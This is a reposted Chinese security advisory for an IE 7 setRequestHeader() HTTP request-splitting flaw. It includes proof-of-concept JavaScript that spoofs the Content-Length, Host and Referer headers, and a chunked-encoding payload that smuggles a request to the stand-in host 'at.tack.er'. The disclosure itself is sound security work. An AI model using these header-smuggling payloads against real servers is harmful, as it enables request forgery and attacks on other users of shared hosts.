Microsoft IE 7 setRequestHeader()函数多个请求拆分/渗透漏洞

最新推荐文章于 2021-10-02 10:15:23 发布
最新推荐文章于 2021-10-02 10:15:23 发布
阅读量991 收藏
点赞数
分类专栏: windows系统管理和安全 文章标签: microsoft ie xmlhttprequest internet web服务 function
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iiprogram/article/details/2220453
版权
受影响版本:
Microsoft Internet Explorer 7.0.5730.11
- Microsoft Windows XP SP2
描述:
BUGTRAQ ID: 28379

Internet Explorer是微软发布的非常流行的WEB浏览器。

IE 7允许通过HTTP请求拆分攻击覆盖Content-Length、Host和Referer等HTTP头,导致HTTP头信息欺骗。

类似于以下javascript:

----------------------------------------------
var x=new XMLHttpRequest();

x.open("POST","/");
for(f=127;f<255;f++)
try{
x.setRequestHeader("Host"+String.fromCharCode(f),"Test");
}catch(dd){}
x.setRequestHeader("Connection","keep-alive");
x.onreadystatechange=function (){
if (x.readyState == 4){
}
}
x.send("blah");
----------------------------------------------

会覆盖以下头:

- Content-Length
x.setRequestHeader("Content-Length"+String.fromCharCode(201),"0");
x.setRequestHeader("Content-Length"+String.fromCharCode(233),"0");
x.setRequestHeader("Content-Length"+String.fromCharCode(240)+String.fromCharCode(213),"0");

- Host

x.setRequestHeader("Host"+String.fromCharCode(223), "www.microsoft.com");

- Referer

x.setRequestHeader("Referer"+String.fromCharCode(205)+String.fromCharCode(155),"http://www.referrer.tld");
x.setRequestHeader("Referer"+String.fromCharCode(237)+String.fromCharCode(155),"http://www.referrer.tld");

Internet Explorer 7允许在setRequestHeader中设置Transfer Encoding: chunked头,导致Http请求拆分/渗透漏洞。

假设存在反射跨站脚本漏洞影响的站点与攻击者的站点托管在同一台主机上,且用户没有配置代理,由于IE7允许设置

setRequestHeader("Transfer-Encoding","chunked");

因此就允许将POST请求中的负载用作Web服务器的其他请求。例如:

-----------------------------------------------------
var x=new XMLHttpRequest();

for(var i =0; i<1;i++){
x.open("POST","/");
x.setRequestHeader("Transfer-Encoding","chunked");

x.setRequestHeader("Proxy-Connection","keep-alive");
x.setRequestHeader("Connection","keep-alive");
x.onreadystatechange=function (){
if (x.readyState == 4){
}
}
try{
x.send("0/r/n/r/nPOST / HTTP/1.1/r/nHost:
at.tack.er/r/nContent-Length: SOMELENGTH/r/n/r/n") }catch(r){} }
-----------------------------------------------------

请求会变为:

----------------------------------------------------
POST / HTTP/1.1
Accept: */*
Accept-Language: it
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Referer: http://vi.ct.im/
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
.NET CLR 2.0.50727; .NET CLR 1.1.4322)
Host: at.tack.er
Content-Length: 67

0

POST /?Send1 HTTP/1.1
Host: at.tack.er
Content-Length: TheLenghtOfTheNextRequest
----------------------------------------------------

这样Web服务器就会打开套接字等待负载。
 
<* 参考:
Stefano Di Paola (stefano@dipaola.wisec.it)

链接:http://marc.info/?l=webappsec&m=120611364624166&w=2
http://marc.info/?l=webappsec&m=120611380224435&w=2
*>
建议:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp
 

iiprogram
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
180426 AJAX
simpleone_的博客
04-26 386
什么是AJAX? (Asynchronous javascript and xml) 用JavaScript以异步的形式操作XML(现在是操作JSON) 在Ajax模型中,客户端向服务器请求额外的数据而无须重新加载整个页面。 AJAX的技术核心是 XMLHttpRequest 对象(XHR),XHR为向服务器发送请求和解析服务器响应提供了接口。也就是说,可以使用XHR获取数据,再通过DOM...
MS IE 7 setRequestHeader() 请求拆分渗透漏洞
gui1401的专栏
06-05 160
MS IE 7 setRequestHeader() 请求拆分渗透漏洞 2008-03-28 16:25:22  www.hackbase.com  来源:互联网受影响系统:Microsoft Internet Explorer 7.0.5730.11- Microsoft Windows XP SP2 描述:Internet Explorer是微软发布的非常流行的WEB浏览器。 IE 7允许通...
几个HTTP请求报头
Chyo的编程日记
04-12 633
1. 读取所有请求报头     可以用一个enumeration类型来获取所有报头,然后使用enumeration类型中内置的hasMoreElement和nextElement方法来取得所有报头名称,然后使用request.getHeader(报头名)来获取相应报头的值。     Enumeration headerNames = request.getHeaders(); 
okhttp请求使用教程,多个header请求头)get、post发送,发送post http请求消息体为json格式,get请求
weixin_41677422的博客
07-06 3615
okhttp请求多个header请求头get、post发送,发送post http请求消息体为json格式发送okhttp的utill工具类 发送okhttp的utill工具类 package com.shus.dataapi.application.event; import com.alibaba.fastjson.JSON; import com.google.gson.Gson; import com.google.gson.JsonObject; ...
XMLHTTP中setRequestHeader()简单分析
qq_44850230的博客
10-02 955
语法 setRequestHeader(header, value); 参数 header字符串,请求头。 value 字符串,值。 通常在HTTP协议里,客户端像服务器取得某个网页的时候,必须发送一个HTTP协议的头文件, 告诉服务器客户端要下载什么信息以及相关的参数,而 XMLHTTP 就是通过HTTP协议取得网站上的文件数据的,所以也要发送HTTP头给服务器。但是 XMLHTTP 默认的情况下有些参数可能没有说明在HTTP头里,这是当我们需要修改或添加这些参数时就用到了setRequestHead
JAVA发送http get/post请求,调用http接口、方法详解
08-26
接下来,我们将通过一个具体的例子来展示如何使用HttpClient库发送POST请求: ```java import org.apache.commons.httpclient.HttpClient; import org.apache.commons.httpclient.methods.PostMethod; import org....
nodejs之get/post请求的几种方式小结
01-20
在Node.js中,向服务器发送GET和POST请求是常见的数据交互方式。以下是对这两种方法的详细解释和示例。 **1. GET请求** GET请求通常用于获取数据,它将请求参数附加到URL中。在HTML表单中,当`method`属性设置为`...
一个完整的jquery+ajax传送请求的实例
08-18
本文将深入探讨一个完整的jQuery+AJAX传输请求的实例,旨在帮助开发者理解如何有效地使用这两种技术实现异步数据通信。 首先,jQuery是一个强大的JavaScript库,它为DOM操作、事件处理、动画效果和Ajax交互提供了...
js get和post请求实现代码解析
11-21
- **注意**:POST请求可以发送更多复杂的数据,比如多个参数,通过URL编码连接(如`'username=abc&password=123'`)。 在HTML部分,`<form>`元素包含了两个输入框,一个是用户名,另一个是地址,以及一个提交按钮...
Javascript原生ajax请求代码实例
10-15
它设置了请求的打开方式(open)、请求头(setRequestHeader)和发送数据(send)。同时,它将`onreadystatechange`事件处理器设置为`run`方法。 3. **run**方法:这个方法处理`onreadystatechange`事件。当请求...
ajax设置请求setRequestHeader方法,如请求数据类型等
热门推荐
All things will be fine__
02-20 4万+
因为平时常用的设置,所以突然被问起来会忘,一般我们ajax是直接利用jQuery的ajax方法,里面的接口直接调用,常用的主要有: url 类型:String 默认值: 当前页地址。发送请求的地址。 type 类型:String 默认值: "GET"。请求方式"POST"或"GET", 默认为"GET"。注意:其它HTTP请求方法,如PUT和DELETE也可以使用,但仅部分浏览器支持。 ...
详解XMLHTTP中setRequestHeader方法和参数
djx6296859的博客
03-21 2502
一、为何要用到setRequestHeader通常在HTTP协议里,客户端像服务器取得某个网页的时候,必须发送一个HTTP协议的头文件,告诉服务器客户端要下载什么信息以及相关的参数。而 XMLHTTP 就是通过HTTP协议取得网站上的文件数据的,所以也要发送HTTP头给服务器。 但是 XMLHTTP 默认的情况下有些参数可能没有说明在HTTP头里,这是当我们需要修改或添加这些参数时就...
XMLHTTP中setRequestHeader参数问题
网站开发初中级代码参考-转载
01-26 1846
新加:设置编码方法 setRequestHeader("Content-Type","application/x-www-form-urlencoded; charset=gb2312") 语法 oXMLHttpRequest.setRequestHeader(bstrHeader, bstrValue); 参数 bstrHeader 字符串,头名称。 ...
ajax+php实现用户登录中的问题(1)略谈XMLHTTP中setRequestHeader方法和参数(转)
cacir的专栏
11-27 1554
<br />注意:在FF里面需要将open方法放在setRequestHeader之前<br />一、为何要用到setRequestHeader<br /> 通常在HTTP协议里,客户端像服务器取得某个网页的 时候,必须发送一个HTTP协议的头文件,告诉服务器客户端要下载什么信息以及相关的参数。而 XMLHTTP 就是通过HTTP协议取得网站上的文件数据的,所以也要发送HTTP头给服务器。 但是 XMLHTTP 默认的情况下有些参数可能没有说明在HTTP头里,这是当我们需要修改或添加这些参数时就
不可或缺的xmlhttp.setRequestHeader()
u011683001的专栏
11-12 1082
注意:在FF里面需要将open方法放在setRequestHeader之前 一、为何要用到setRequestHeader 通 常在HTTP协议里,客户端像服务器取得某个网页的时候,必须发送一个HTTP协议的头文件,告诉服务器客户端要下载什么信息以及相关的参数。而 XMLHTTP 就是通过HTTP协议取得网站上的文件数据的,所以也要发送HTTP头给服务器。 但是 XMLHTTP 默认的情况下有
ajax中的setRequestHeader设置请求
hong2511的博客
08-04 1万+
1、问题引发点: 前不久发现一个问题: 前端并没有设置请求头信息里面的Accept-Encoding:gzip...但是在请求头中可以明显的看到Accept-Encoding:gzip, defla
setRequestHeader多个参数
最新发布
08-05
setRequestHeader方法可以用于添加或修改HTTP头的参数。可以通过多次调用该方法来设置多个参数。每次调用setRequestHeader方法时,需要传递两个参数:参数的...通过多次调用setRequestHeader方法,可以设置多个参数。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值